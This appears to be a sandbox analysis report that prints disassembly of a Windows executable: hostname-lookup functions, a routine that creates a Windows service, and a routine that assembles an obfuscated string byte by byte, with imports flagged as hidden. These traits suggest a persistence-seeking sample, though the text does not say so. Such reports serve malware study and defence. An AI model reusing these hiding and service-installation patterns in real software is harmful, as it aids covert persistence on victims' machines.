00414547 pop ecx Count = 2
00414548 mov dword ptr fs:[eax], edx
0041454B push 0041463Ch
00414550 mov eax, dword ptr [0042C8A4h] 00960A4C xrefs 00414560
00414555 call 0041391Ch
0041455A ret function end
00414562 xor eax, eax xrefs 004144F0
00414564 mov dword ptr [ebp-08h], eax
00414567 xor edx, edx
00414569 push ebp
0041456A push 00414635h
0041456F push dword ptr fs:[edx]
00414572 mov dword ptr fs:[edx], esp
00414575 lea eax, dword ptr [ebp-34h]
00414578 xor ecx, ecx
0041457A mov edx, 00000020h
0041457F call 00403030h
00414584 xor eax, eax
00414586 mov dword ptr [ebp-30h], eax
00414589 mov eax, dword ptr [ebp+0Ch]
0041458C mov dword ptr [ebp-2Ch], eax
0041458F mov dword ptr [ebp-28h], edi
00414592 xor eax, eax
00414594 mov dword ptr [ebp-34h], eax
00414597 lea eax, dword ptr [ebp-08h]
0041459A push eax
0041459B lea eax, dword ptr [ebp-34h]
0041459E push eax
0041459F push 00000000h
004145A1 mov eax, dword ptr [ebp-04h]
004145A4 call 00404878h
004145A9 push eax
004145AA call dword ptr [0042B44Ch] getaddrinfo@WS2_32.DLL (Hidden Import)
004145B0 test eax, eax
004145B2 jne 00414617h
004145B4 cmp dword ptr [ebp-08h], 00000000h
004145B8 je 00414617h
004145BA mov esi, 00000401h
004145BF mov edi, 00000020h
004145C4 lea eax, dword ptr [ebp-0Ch]
004145C7 mov edx, esi
004145C9 call 004049A8h
004145CE lea eax, dword ptr [ebp-10h]
004145D1 mov edx, edi
004145D3 call 004049A8h
004145D8 push 00000008h
004145DA push edi
004145DB mov eax, dword ptr [ebp-10h]
004145DE call 00404878h
004145E3 push eax
004145E4 push esi
004145E5 mov eax, dword ptr [ebp-0Ch]
004145E8 call 00404878h
004145ED push eax
004145EE mov eax, dword ptr [ebp-08h]
004145F1 mov eax, dword ptr [eax+10h]
004145F4 push eax
004145F5 mov eax, dword ptr [ebp-08h]
004145F8 mov eax, dword ptr [eax+18h]
004145FB push eax
004145FC call dword ptr [0042B454h] getnameinfo@WS2_32.DLL (Hidden Import)
00414602 test eax, eax
00414604 jne 00414617h
00414606 mov eax, dword ptr [ebp-0Ch]
00414609 call 00404878h
0041460E mov edx, eax
00414610 mov eax, ebx
00414612 call 004045D4h
00414617 xor eax, eax xrefs 004145B2, 004145B8, 00414604
00414619 pop edx
0041461B pop ecx Count = 2
0041461C mov dword ptr fs:[eax], edx
0041461F push 0041463Ch
00414624 cmp dword ptr [ebp-08h], 00000000h xrefs 0041463A
00414628 je 00414634h
0041462A mov eax, dword ptr [ebp-08h]
0041462D push eax
0041462E call dword ptr [0042B450h] FreeAddrInfoW@WS2_32.DLL (Hidden Import)
00414634 ret xrefs 00414628 function end
0041463C xor eax, eax xrefs 00414508
0041463E pop edx
00414640 pop ecx Count = 2
00414641 mov dword ptr fs:[eax], edx
00414644 push 00414666h
00414649 lea eax, dword ptr [ebp-10h] xrefs 00414664
0041464C mov edx, 00000002h
00414651 call 00404400h
00414656 lea eax, dword ptr [ebp-04h]
00414659 call 004043DCh
0041465E ret function end
Function 00412ED8, API count: 1, instr count: 6
APIs
  • CloseHandle.KERNEL32, ref: 00412EE8
Address Instruction Meta Information
00412ED8 push 0042C860h xrefs 004136B1
00412EDD call 00406114h
00412EE2 mov eax, dword ptr [0042C848h] 00000048
00412EE7 push eax
00412EE8 call 004060ECh CloseHandle@KERNEL32.DLL (Hidden Import)
00412EED ret function end
Function 004029BC, API count: 1, instr count: 37
APIs
  • GetCommandLineA.KERNEL32, ref: 004029F2
Address Instruction Meta Information
004029BC push ebx xrefs 00429EAD
004029BD push esi
004029BE push edi
004029BF add esp, FFFFFEF8h
004029C5 mov ebx, edx
004029C7 mov esi, eax
004029C9 mov eax, ebx
004029CB call 004043DCh
004029D0 test esi, esi
004029D2 jne 004029F2h
004029D4 push 00000105h
004029D9 lea eax, dword ptr [esp+04h]
004029DD push eax
004029DE push 00000000h
004029E0 call 00401258h
004029E5 mov ecx, eax
004029E7 mov edx, esp
004029E9 mov eax, ebx
004029EB call 004044CCh
004029F0 jmp 00402A10h
004029F2 call 00401240h GetCommandLineA@KERNEL32.DLL (Hidden Import) xrefs 004029D2
004029F7 mov edi, eax
004029F9 mov edx, ebx xrefs 00402A0E
004029FB mov eax, edi
004029FD call 004028D0h
00402A02 mov edi, eax
00402A04 test esi, esi
00402A06 je 00402A10h
00402A08 cmp dword ptr [ebx], 00000000h
00402A0B je 00402A10h
00402A0D dec esi
00402A0E jmp 004029F9h
00402A10 add esp, 00000108h xrefs 00402A06, 00402A0B, 004029F0
00402A16 pop edi
00402A17 pop esi
00402A18 pop ebx
00402A19 ret function end
Function 004073AC, API count: 1, instr count: 23
APIs
  • CompareStringA.KERNEL32, ref: 004073D9
Address Instruction Meta Information
004073AC push ebx xrefs 004073EE, 0040990F, 00409D7F, 00409DA9, 004118BC, 00411F24
004073AD push esi
004073AE mov esi, edx
004073B0 mov ebx, eax
004073B2 mov eax, esi
004073B4 call 00404678h
004073B9 push eax
004073BA mov eax, esi
004073BC call 00404878h
004073C1 push eax
004073C2 mov eax, ebx
004073C4 call 00404678h
004073C9 push eax
004073CA mov eax, ebx
004073CC call 00404878h
004073D1 push eax
004073D2 push 00000001h
004073D4 push 00000400h
004073D9 call 004060F4h CompareStringA@KERNEL32.DLL (Hidden Import)
004073DE sub eax, 02h
004073E1 pop esi
004073E2 pop ebx
004073E3 ret function end
Function 00429AB4, API count: 3, instr count: 44
APIs
  • OpenSCManagerA.ADVAPI32, ref: 00429AC4
  • CreateServiceA.ADVAPI32, ref: 00429AF5
  • CloseServiceHandle.ADVAPI32, ref: 00429AFD
Address Instruction Meta Information
00429AB4 push ebx xrefs 00429ECE
00429AB5 push esi
00429AB6 push edi
00429AB7 push ebp
00429AB8 mov ebp, edx
00429ABA mov edi, eax
00429ABC xor ebx, ebx
00429ABE push 00000002h
00429AC2 push 00000000h Count = 2
00429AC4 call 00421BC4h OpenSCManagerA@ADVAPI32.DLL (Hidden Import)
00429AC9 mov esi, eax
00429ACB test esi, esi
00429ACD je 00429B0Ch
00429AD7 push 00000000h Count = 5
00429AD9 push edi
00429ADA push 00000001h
00429ADC push 00000002h
00429ADE push 00000110h
00429AE3 push 000F0000h
00429AE8 mov eax, dword ptr [0042DAA0h] 00961190
00429AED call 00404878h
00429AF2 push eax
00429AF3 push ebp
00429AF4 push esi
00429AF5 call 00421BCCh CreateServiceA@ADVAPI32.DLL (Hidden Import)
00429AFA mov ebx, eax
00429AFC push esi
00429AFD call 00421B64h CloseServiceHandle@ADVAPI32.DLL (Hidden Import)
00429B02 test ebx, ebx
00429B04 je 00429B0Ah
00429B06 mov bl, 01h
00429B08 jmp 00429B0Ch
00429B0A xor ebx, ebx xrefs 00429B04
00429B0C mov eax, ebx xrefs 00429ACD, 00429B08
00429B0E pop ebp
00429B0F pop edi
00429B10 pop esi
00429B11 pop ebx
00429B12 ret function end
Function 00418AA4, API count: 0, instr count: 90
Address Instruction Meta Information
00418AA4 push ebp xrefs 0041C2AD
00418AA5 mov ebp, esp
00418AA7 add esp, FFFFFFF0h
00418AAA push ebx
00418AAB push esi
00418AAC push edi
00418AAD xor ebx, ebx
00418AAF mov dword ptr [ebp-10h], ebx
00418AB2 mov ebx, ecx
00418AB4 mov dword ptr [ebp-08h], edx
00418AB7 mov dword ptr [ebp-04h], eax
00418ABA xor eax, eax
00418ABC push ebp
00418ABD push 00418BBAh
00418AC2 push dword ptr fs:[eax]
00418AC5 mov dword ptr fs:[eax], esp
00418AC8 xor eax, eax
00418ACA mov dword ptr [ebp-0Ch], eax
00418ACD mov eax, dword ptr [ebp-04h]
00418AD0 call 004186ECh
00418AD5 test al, al
00418AD7 jne 00418BA4h
00418ADD mov eax, dword ptr [ebp-04h]
00418AE0 add eax, 00000084h
00418AE5 push eax
00418AE6 mov eax, dword ptr [ebp-04h]
00418AE9 mov ecx, dword ptr [eax+00000080h]
00418AEF mov edx, ebx
00418AF1 mov eax, dword ptr [ebp-04h]
00418AF4 call 004185FCh
00418AF9 xor eax, eax
00418AFB push ebp
00418AFC push 00418B29h
00418B01 push dword ptr fs:[eax]
00418B04 mov dword ptr fs:[eax], esp
00418B07 push 00000000h
00418B09 mov eax, dword ptr [ebp-04h]
00418B0C mov eax, dword ptr [eax+000001B4h]
00418B12 mov ecx, ebx
00418B14 mov edx, dword ptr [ebp-08h]
00418B17 call 00413AF0h
00418B1C mov dword ptr [ebp-0Ch], eax
00418B1F xor eax, eax
00418B21 pop edx
00418B23 pop ecx Count = 2
00418B24 mov dword ptr fs:[eax], edx
00418B27 jmp 00418B33h
00418B33 cmp dword ptr [ebp-0Ch], 00000000h xrefs 00418B27
00418B37 jne 00418B48h
00418B39 mov eax, dword ptr [ebp-04h]
00418B3C mov dword ptr [eax+000001B8h], 00002746h
00418B46 jmp 00418B53h
00418B48 mov edx, dword ptr [ebp-0Ch] xrefs 00418B37
00418B4B mov eax, dword ptr [ebp-04h]
00418B4E mov ecx, dword ptr [eax]
00418B50 call dword ptr [ecx+78h]
00418B53 mov eax, dword ptr [ebp-04h] xrefs 00418B46
00418B56 call 0041952Ch
00418B5B cmp dword ptr [ebp-0Ch], 00000000h
00418B5F jle 00418BA4h
00418B61 mov eax, dword ptr [ebp-04h]
00418B64 mov edx, dword ptr [ebp-0Ch]
00418B67 add dword ptr [eax+0000019Ch], edx
00418B6D lea edx, dword ptr [ebp-10h]
00418B70 mov eax, dword ptr [ebp-0Ch]
00418B73 call 004074CCh
00418B78 mov ecx, dword ptr [ebp-10h]
00418B7B mov dl, 0Ah
00418B7D mov eax, dword ptr [ebp-04h]
00418B80 call 00419E70h
00418B85 mov eax, dword ptr [ebp-0Ch]
00418B88 push eax
00418B89 mov ecx, dword ptr [ebp-08h]
00418B8C xor edx, edx
00418B8E mov eax, dword ptr [ebp-04h]
00418B91 call 00419F3Ch
00418B96 lea ecx, dword ptr [ebp-0Ch]
00418B99 mov edx, dword ptr [ebp-08h]
00418B9C mov eax, dword ptr [ebp-04h]
00418B9F call 00419E88h
00418BA4 xor eax, eax xrefs 00418AD7, 00418B5F
00418BA6 pop edx
00418BA8 pop ecx Count = 2
00418BA9 mov dword ptr fs:[eax], edx
00418BAC push 00418BC1h
00418BB1 lea eax, dword ptr [ebp-10h] xrefs 00418BBF
00418BB4 call 004043DCh
00418BB9 ret function end
Function 0040F3C8, API count: 2, instr count: 64
APIs
  • RtlEnterCriticalSection.NTDLL, ref: 0040F3FE
  • RtlLeaveCriticalSection.NTDLL, ref: 0040F46A
Address Instruction Meta Information
0040F3C8 push ebp xrefs 0040EFE7, 0040DAE6, 0040DE08, 0040E0F9, 0040E7F0, 0040F1F3, 0040F1AB
0040F3C9 mov ebp, esp
0040F3CB push ecx
0040F3CC push ebx
0040F3CD push esi
0040F3CE push edi
0040F3CF mov esi, edx
0040F3D1 mov ebx, eax
0040F3D3 cmp dword ptr [0042C81Ch], 00000000h
0040F3DA je 0040F3EAh
0040F3DC cmp bx, 0100h
0040F3E1 jc 0040F3EAh
0040F3E3 cmp bx, 07FFh
0040F3E8 jbe 0040F3EEh
0040F3EA xor eax, eax xrefs 0040F3DA, 0040F3E1
0040F3EC jmp 0040F3F0h
0040F3EE mov al, 01h xrefs 0040F3E8
0040F3F0 mov byte ptr [ebp-01h], al xrefs 0040F3EC
0040F3F3 cmp byte ptr [ebp-01h], 00000000h
0040F3F7 je 0040F477h
0040F3F9 push 0042C820h
0040F3FE call 0040611Ch RtlEnterCriticalSection@NTDLL.DLL (Hidden Import)
0040F403 xor eax, eax
0040F405 push ebp
0040F406 push 0040F470h
0040F40B push dword ptr fs:[eax]
0040F40E mov dword ptr fs:[eax], esp
0040F411 mov eax, dword ptr [0042C81Ch] 00000000
0040F416 call 0040508Ch
0040F41B movzx edi, bx
0040F41E mov edx, edi
0040F420 sub edx, 00000100h
0040F426 cmp eax, edx
0040F428 setnle byte ptr [ebp-01h]
0040F42C cmp byte ptr [ebp-01h], 00000000h
0040F430 je 0040F458h
0040F432 mov eax, dword ptr [0042C81Ch] 00000000
0040F437 mov eax, dword ptr [eax+edi*4-00000400h]
0040F43E mov dword ptr [esi], eax
0040F440 cmp dword ptr [esi], 00000000h
0040F443 je 0040F44Fh
0040F445 mov eax, dword ptr [esi]
0040F447 cmp eax, dword ptr [0042B344h] FFFFFFFF
0040F44D jne 0040F453h
0040F44F xor eax, eax xrefs 0040F443
0040F451 jmp 0040F455h
0040F453 mov al, 01h xrefs 0040F44D
0040F455 mov byte ptr [ebp-01h], al xrefs 0040F451
0040F458 xor eax, eax xrefs 0040F430
0040F45A pop edx
0040F45C pop ecx Count = 2
0040F45D mov dword ptr fs:[eax], edx
0040F460 push 0040F477h
0040F465 push 0042C820h xrefs 0040F475
0040F46A call 0040623Ch RtlLeaveCriticalSection@NTDLL.DLL (Hidden Import)
0040F46F ret function end
0040F477 mov al, byte ptr [ebp-01h] xrefs 0040F3F7
0040F47A pop edi
0040F47B pop esi
0040F47C pop ebx
0040F47D pop ecx
0040F47E pop ebp
0040F47F ret function end
Function 00421DD8, API count: 0, instr count: 432
Address Instruction Meta Information
00421DD8 push ebp xrefs 0042251A
00421DD9 mov ebp, esp
00421DDB add esp, FFFFFD08h
00421DE1 push ebx
00421DE2 push esi
00421DE3 push edi
00421DE4 xor edx, edx
00421DE6 mov dword ptr [ebp-000002F8h], edx
00421DEC mov dword ptr [ebp-000002F0h], edx
00421DF2 mov dword ptr [ebp-000002F4h], edx
00421DF8 mov dword ptr [ebp-000002E8h], edx
00421DFE mov dword ptr [ebp-000002ECh], edx
00421E04 mov dword ptr [ebp-000002A4h], edx
00421E0A mov dword ptr [ebp-000002A8h], edx
00421E10 mov dword ptr [ebp-04h], edx
00421E13 mov esi, eax
00421E15 xor eax, eax
00421E17 push ebp
00421E18 push 004224F5h
00421E1D push dword ptr fs:[eax]
00421E20 mov dword ptr fs:[eax], esp
00421E23 xor eax, eax
00421E25 push ebp
00421E26 push 004224B5h
00421E2B push dword ptr fs:[eax]
00421E2E mov dword ptr fs:[eax], esp
00421E31 mov ebx, 00000001h
00421E36 lea edx, dword ptr [ebp-000002A4h]
00421E3C mov ax, 001Ch
00421E40 call 00421CB8h
00421E45 lea eax, dword ptr [ebp-000002A4h]
00421E4B push eax
00421E4C lea eax, dword ptr [ebp-000002ACh]
00421E52 imul edx, ebx, 5Ah
00421E55 mov edi, ebx
00421E57 add edi, edi
00421E59 add edx, edi
00421E5B mov byte ptr [eax+01h], dl
00421E5E mov byte ptr [eax], 00000001h
00421E61 lea edx, dword ptr [ebp-000002ACh]
00421E67 lea eax, dword ptr [ebp-000002B0h]
00421E6D call 00402EFCh
00421E72 lea eax, dword ptr [ebp-000002B4h]
00421E78 mov edx, ebx
00421E7A shl edx, 02h
00421E7D push edx
00421E7E mov edx, 00000077h
00421E83 pop ecx
00421E84 sub edx, ecx
00421E86 mov byte ptr [eax+01h], dl
00421E89 mov byte ptr [eax], 00000001h
00421E8C lea edx, dword ptr [ebp-000002B4h]
00421E92 lea eax, dword ptr [ebp-000002B0h]
00421E98 mov cl, 02h
00421E9A call 00402ECCh
00421E9F lea edx, dword ptr [ebp-000002B0h]
00421EA5 lea eax, dword ptr [ebp-000002B8h]
00421EAB call 00402EFCh
00421EB0 lea eax, dword ptr [ebp-000002B4h]
00421EB6 lea edx, dword ptr [ebx+4Bh]
00421EB9 mov byte ptr [eax+01h], dl
00421EBC mov byte ptr [eax], 00000001h
00421EBF lea edx, dword ptr [ebp-000002B4h]
00421EC5 lea eax, dword ptr [ebp-000002B8h]
00421ECB mov cl, 03h
00421ECD call 00402ECCh
00421ED2 lea edx, dword ptr [ebp-000002B8h]
00421ED8 lea eax, dword ptr [ebp-000002C0h]
00421EDE call 00402EFCh
00421EE3 lea eax, dword ptr [ebp-000002B4h]
00421EE9 lea edx, dword ptr [ebx+ebx+52h]
00421EED mov byte ptr [eax+01h], dl
00421EF0 mov byte ptr [eax], 00000001h
00421EF3 lea edx, dword ptr [ebp-000002B4h]
00421EF9 lea eax, dword ptr [ebp-000002C0h]
00421EFF mov cl, 04h
00421F01 call 00402ECCh
00421F06 lea edx, dword ptr [ebp-000002C0h]
00421F0C lea eax, dword ptr [ebp-000002C8h]
00421F12 call 00402EFCh
00421F17 lea eax, dword ptr [ebp-000002B4h]
00421F1D mov edx, 00000030h
00421F22 sub edx, edi
00421F24 mov byte ptr [eax+01h], dl
00421F27 mov byte ptr [eax], 00000001h
00421F2A lea edx, dword ptr [ebp-000002B4h]
00421F30 lea eax, dword ptr [ebp-000002C8h]
00421F36 mov cl, 05h
00421F38 call 00402ECCh
00421F3D lea edx, dword ptr [ebp-000002C8h]
00421F43 lea eax, dword ptr [ebp-000002D0h]
00421F49 call 00402EFCh
00421F4E lea eax, dword ptr [ebp-000002B4h]
00421F54 lea edx, dword ptr [ebx+64h]
00421F57 mov byte ptr [eax+01h], dl
00421F5A mov byte ptr [eax], 00000001h
00421F5D lea edx, dword ptr [ebp-000002B4h]
00421F63 lea eax, dword ptr [ebp-000002D0h]
00421F69 mov cl, 06h
00421F6B call 00402ECCh
00421F70 lea edx, dword ptr [ebp-000002D0h]
00421F76 lea eax, dword ptr [ebp-000002D8h]
00421F7C call 00402EFCh
00421F81 lea eax, dword ptr [ebp-000002B4h]
00421F87 mov edx, ebx
00421F89 add edx, edx
00421F8B add edx, 76h
00421F8E mov byte ptr [eax+01h], dl
00421F91 mov byte ptr [eax], 00000001h
00421F94 lea edx, dword ptr [ebp-000002B4h]
00421F9A lea eax, dword ptr [ebp-000002D8h]
00421FA0 mov cl, 07h
00421FA2 call 00402ECCh
00421FA7 lea edx, dword ptr [ebp-000002D8h]
00421FAD lea eax, dword ptr [ebp-000002E4h]
00421FB3 call 00402EFCh
00421FB8 lea eax, dword ptr [ebp-000002B4h]
00421FBE imul edx, ebx, 0Bh
00421FC1 add edx, 5Bh
00421FC4 mov byte ptr [eax+01h], dl
00421FC7 mov byte ptr [eax], 00000001h
00421FCA lea edx, dword ptr [ebp-000002B4h]
00421FD0 lea eax, dword ptr [ebp-000002E4h]
00421FD6 mov cl, 08h
00421FD8 call 00402ECCh
00421FDD lea edx, dword ptr [ebp-000002E4h]
00421FE3 lea eax, dword ptr [ebp-000002A8h]
00421FE9 call 00404640h
00421FEE mov edx, dword ptr [ebp-000002A8h]
00421FF4 pop eax
00421FF5 call 00404680h
00421FFA mov eax, dword ptr [ebp-000002A4h]
00422000 call 00407978h
00422005 test al, al
00422007 jne 0042225Dh
0042200D lea edx, dword ptr [ebp-000002E8h]
00422013 mov ax, 001Ch
00422017 call 00421CB8h
0042201C lea eax, dword ptr [ebp-000002E8h]
00422022 push eax
00422023 lea eax, dword ptr [ebp-000002ACh]
00422029 imul edx, ebx, 5Ah
0042202C mov ecx, ebx
0042202E add ecx, ecx
00422030 add edx, ecx
00422032 mov byte ptr [eax+01h], dl
00422035 mov byte ptr [eax], 00000001h
00422038 lea edx, dword ptr [ebp-000002ACh]
0042203E lea eax, dword ptr [ebp-000002B0h]
00422044 call 00402EFCh
00422049 lea eax, dword ptr [ebp-000002B4h]
0042204F mov edx, ebx
00422051 shl edx, 02h
00422054 push edx
00422055 mov edx, 00000077h
0042205A pop ecx
0042205B sub edx, ecx
0042205D mov byte ptr [eax+01h], dl
00422060 mov byte ptr [eax], 00000001h
00422063 lea edx, dword ptr [ebp-000002B4h]
00422069 lea eax, dword ptr [ebp-000002B0h]
0042206F mov cl, 02h
00422071 call 00402ECCh
00422076 lea edx, dword ptr [ebp-000002B0h]
0042207C lea eax, dword ptr [ebp-000002B8h]
00422082 call 00402EFCh
00422087 lea eax, dword ptr [ebp-000002B4h]
0042208D lea edx, dword ptr [ebx+4Bh]
00422090 mov byte ptr [eax+01h], dl
00422093 mov byte ptr [eax], 00000001h
00422096 lea edx, dword ptr [ebp-000002B4h]
0042209C lea eax, dword ptr [ebp-000002B8h]
004220A2 mov cl, 03h
004220A4 call 00402ECCh
004220A9 lea edx, dword ptr [ebp-000002B8h]
004220AF lea eax, dword ptr [ebp-000002C0h]
004220B5 call 00402EFCh
004220BA lea eax, dword ptr [ebp-000002B4h]
004220C0 lea edx, dword ptr [ebx+ebx+52h]
004220C4 mov byte ptr [eax+01h], dl
004220C7 mov byte ptr [eax], 00000001h
004220CA lea edx, dword ptr [ebp-000002B4h]
004220D0 lea eax, dword ptr [ebp-000002C0h]
004220D6 mov cl, 04h
004220D8 call 00402ECCh
004220DD lea edx, dword ptr [ebp-000002C0h]
004220E3 lea eax, dword ptr [ebp-000002C8h]
004220E9 call 00402EFCh
004220EE lea eax, dword ptr [ebp-000002B4h]
004220F4 mov edx, ebx
004220F6 add edx, edx
004220F8 push edx
004220F9 mov edx, 00000030h
004220FE pop ecx
004220FF sub edx, ecx
00422101 mov byte ptr [eax+01h], dl
00422104 mov byte ptr [eax], 00000001h
00422107 lea edx, dword ptr [ebp-000002B4h]
0042210D lea eax, dword ptr [ebp-000002C8h]
00422113 mov cl, 05h
00422115 call 00402ECCh
0042211A lea edx, dword ptr [ebp-000002C8h]
00422120 lea eax, dword ptr [ebp-000002D0h]
00422126 call 00402EFCh
0042212B lea eax, dword ptr [ebp-000002B4h]
00422131 lea edx, dword ptr [ebx+64h]
00422134 mov byte ptr [eax+01h], dl
00422137 mov byte ptr [eax], 00000001h
0042213A lea edx, dword ptr [ebp-000002B4h]
00422140 lea eax, dword ptr [ebp-000002D0h]
00422146 mov cl, 06h
00422148 call 00402ECCh
0042214D lea edx, dword ptr [ebp-000002D0h]
00422153 lea eax, dword ptr [ebp-000002D8h]
00422159 call 00402EFCh
0042215E lea eax, dword ptr [ebp-000002B4h]
00422164 mov edx, ebx
00422166 add edx, edx
00422168 add edx, 76h
0042216B mov byte ptr [eax+01h], dl
0042216E mov byte ptr [eax], 00000001h
00422171 lea edx, dword ptr [ebp-000002B4h]
00422177 lea eax, dword ptr [ebp-000002D8h]
0042217D mov cl, 07h
0042217F call 00402ECCh
00422184 lea edx, dword ptr [ebp-000002D8h]
0042218A lea eax, dword ptr [ebp-000002E4h]
00422190 call 00402EFCh
00422195 lea eax, dword ptr [ebp-000002B4h]
0042219B imul edx, ebx, 0Bh
0042219E add edx, 5Bh
004221A1 mov byte ptr [eax+01h], dl
004221A4 mov byte ptr [eax], 00000001h
004221A7 lea edx, dword ptr [ebp-000002B4h]
004221AD lea eax, dword ptr [ebp-000002E4h]
004221B3 mov cl, 08h
004221B5 call 00402ECCh
004221BA lea edx, dword ptr [ebp-000002E4h]
004221C0 lea eax, dword ptr [ebp-000002ECh]
004221C6 call 00404640h
004221CB mov edx, dword ptr [ebp-000002ECh]
004221D1 pop eax
004221D2 call 00404680h
004221D7 mov edx, dword ptr [ebp-000002E8h]
004221DD lea eax, dword ptr [ebp-000002A0h]
004221E3 call 00402CDCh
004221E8 mov edx, 00000001h
004221ED lea eax, dword ptr [ebp-000002A0h]
004221F3 call 00403190h
004221F8 call 004027F0h
004221FD xor ebx, ebx
004221FF lea edx, dword ptr [ebp-04h]
00422202 mov eax, 00000020h
00422207 call 00421D34h
0042220C mov eax, esi
0042220E mov edx, dword ptr [ebp-04h]
00422211 call 00404430h
00422216 jmp 0042223Ch
00422218 inc ebx xrefs 00422246
00422219 push 00000000h
0042221B lea eax, dword ptr [ebp-04h]
0042221E call 004048D0h
00422223 lea edx, dword ptr [eax+ebx-01h]
00422227 mov ecx, 00000001h
0042222C lea eax, dword ptr [ebp-000002A0h]
00422232 call 00402E54h
00422237 call 004027F0h
0042223C mov eax, dword ptr [ebp-04h] xrefs 00422216
0042223F call 00404678h
00422244 cmp ebx, eax
00422246 jl 00422218h
00422248 lea eax, dword ptr [ebp-000002A0h]
0042224E call 00402E74h
00422253 call 004027F0h
00422258 jmp 004224ABh
0042225D lea edx, dword ptr [ebp-000002F0h] xrefs 00422007
00422263 mov ax, 001Ch
00422267 call 00421CB8h
0042226C lea eax, dword ptr [ebp-000002F0h]
00422272 push eax
00422273 lea eax, dword ptr [ebp-000002ACh]
00422279 imul edx, ebx, 5Bh
0042227C add edx, ebx
0042227E mov byte ptr [eax+01h], dl
00422281 mov byte ptr [eax], 00000001h
00422284 lea edx, dword ptr [ebp-000002ACh]
0042228A lea eax, dword ptr [ebp-000002B0h]
00422290 call 00402EFCh
00422295 lea eax, dword ptr [ebp-000002B4h]
0042229B mov edx, ebx
0042229D shl edx, 02h
004222A0 push edx
004222A1 mov edx, 00000077h
004222A6 pop ecx
004222A7 sub edx, ecx
004222A9 mov byte ptr [eax+01h], dl
004222AC mov byte ptr [eax], 00000001h
004222AF lea edx, dword ptr [ebp-000002B4h]
004222B5 lea eax, dword ptr [ebp-000002B0h]
004222BB mov cl, 02h
004222BD call 00402ECCh
004222C2 lea edx, dword ptr [ebp-000002B0h]
004222C8 lea eax, dword ptr [ebp-000002B8h]
004222CE call 00402EFCh
004222D3 lea eax, dword ptr [ebp-000002B4h]
004222D9 lea edx, dword ptr [ebx+4Bh]
004222DC mov byte ptr [eax+01h], dl
004222DF mov byte ptr [eax], 00000001h
004222E2 lea edx, dword ptr [ebp-000002B4h]
004222E8 lea eax, dword ptr [ebp-000002B8h]
004222EE mov cl, 03h
004222F0 call 00402ECCh
004222F5 lea edx, dword ptr [ebp-000002B8h]
004222FB lea eax, dword ptr [ebp-000002C0h]
00422301 call 00402EFCh
00422306 lea eax, dword ptr [ebp-000002B4h]
0042230C lea edx, dword ptr [ebx+ebx+52h]
00422310 mov byte ptr [eax+01h], dl
00422313 mov byte ptr [eax], 00000001h
00422316 lea edx, dword ptr [ebp-000002B4h]
0042231C lea eax, dword ptr [ebp-000002C0h]
00422322 mov cl, 04h
00422324 call 00402ECCh
00422329 lea edx, dword ptr [ebp-000002C0h]
0042232F lea eax, dword ptr [ebp-000002C8h]
00422335 call 00402EFCh
0042233A lea eax, dword ptr [ebp-000002B4h]
00422340 mov edx, ebx
00422342 add edx, edx
00422344 push edx
00422345 mov edx, 00000030h
0042234A pop ecx
0042234B sub edx, ecx
0042234D mov byte ptr [eax+01h], dl
00422350 mov byte ptr [eax], 00000001h
00422353 lea edx, dword ptr [ebp-000002B4h]
00422359 lea eax, dword ptr [ebp-000002C8h]
0042235F mov cl, 05h
00422361 call 00402ECCh
00422366 lea edx, dword ptr [ebp-000002C8h]
0042236C lea eax, dword ptr [ebp-000002D0h]
00422372 call 00402EFCh
00422377 lea eax, dword ptr [ebp-000002B4h]
0042237D lea edx, dword ptr [ebx+64h]
00422380 mov byte ptr [eax+01h], dl
00422383 mov byte ptr [eax], 00000001h
00422386 lea edx, dword ptr [ebp-000002B4h]
0042238C lea eax, dword ptr [ebp-000002D0h]
00422392 mov cl, 06h
00422394 call 00402ECCh
00422399 lea edx, dword ptr [ebp-000002D0h]
0042239F lea eax, dword ptr [ebp-000002D8h]
004223A5 call 00402EFCh
004223AA lea eax, dword ptr [ebp-000002B4h]
004223B0 mov edx, ebx
004223B2 add edx, edx
004223B4 add edx, 76h
004223B7 mov byte ptr [eax+01h], dl
004223BA mov byte ptr [eax], 00000001h
004223BD lea edx, dword ptr [ebp-000002B4h]
004223C3 lea eax, dword ptr [ebp-000002D8h]
004223C9 mov cl, 07h
004223CB call 00402ECCh
004223D0 lea edx, dword ptr [ebp-000002D8h]
004223D6 lea eax, dword ptr [ebp-000002E4h]
004223DC call 00402EFCh
004223E1 lea eax, dword ptr [ebp-000002B4h]
004223E7 imul edx, ebx, 0Bh
004223EA add edx, 5Bh
004223ED mov byte ptr [eax+01h], dl
004223F0 mov byte ptr [eax], 00000001h
004223F3 lea edx, dword ptr [ebp-000002B4h]
004223F9 lea eax, dword ptr [ebp-000002E4h]
004223FF mov cl, 08h
00422401 call 00402ECCh
00422406 lea edx, dword ptr [ebp-000002E4h]
0042240C lea eax, dword ptr [ebp-000002F4h]
00422412 call 00404640h
00422417 mov edx, dword ptr [ebp-000002F4h]
0042241D pop eax
0042241E call 00404680h
00422423 mov edx, dword ptr [ebp-000002F0h]
00422429 lea eax, dword ptr [ebp-00000154h]
0042242F call 00402CDCh
00422434 mov edx, 00000001h
00422439 lea eax, dword ptr [ebp-00000154h]
0042243F call 00403174h
00422444 call 004027F0h
00422449 mov eax, esi
0042244B call 004043DCh
00422450 jmp 00422487h
00422452 push 00000000h xrefs 00422499
00422454 lea edx, dword ptr [ebp-05h]
00422457 mov ecx, 00000001h
0042245C lea eax, dword ptr [ebp-00000154h]
00422462 call 00402E34h
00422467 call 004027F0h
0042246C lea eax, dword ptr [ebp-000002F8h]
00422472 mov dl, byte ptr [ebp-05h]
00422475 call 004045C4h
0042247A mov edx, dword ptr [ebp-000002F8h]
00422480 mov eax, esi
00422482 call 00404680h
00422487 lea eax, dword ptr [ebp-00000154h] xrefs 00422450
0042248D call 00402F78h
00422492 call 004027F0h
00422497 test al, al
00422499 je 00422452h
0042249B lea eax, dword ptr [ebp-00000154h]
004224A1 call 00402E74h
004224A6 call 004027F0h
004224AB xor eax, eax xrefs 00422258
004224AD pop edx
004224AF pop ecx Count = 2
004224B0 mov dword ptr fs:[eax], edx
004224B3 jmp 004224BFh
004224BF xor eax, eax xrefs 004224B3
004224C1 pop edx
004224C3 pop ecx Count = 2
004224C4 mov dword ptr fs:[eax], edx
004224C7 push 004224FCh
004224CC lea eax, dword ptr [ebp-000002F8h] xrefs 004224FA
004224D2 mov edx, 00000005h
004224D7 call 00404400h
004224DC lea eax, dword ptr [ebp-000002A8h]
004224E2 mov edx, 00000002h
004224E7 call 00404400h
004224EC lea eax, dword ptr [ebp-04h]
004224EF call 004043DCh
004224F4 ret function end
Function 00407978, API count: 0, instr count: 8
Address Instruction Meta Information
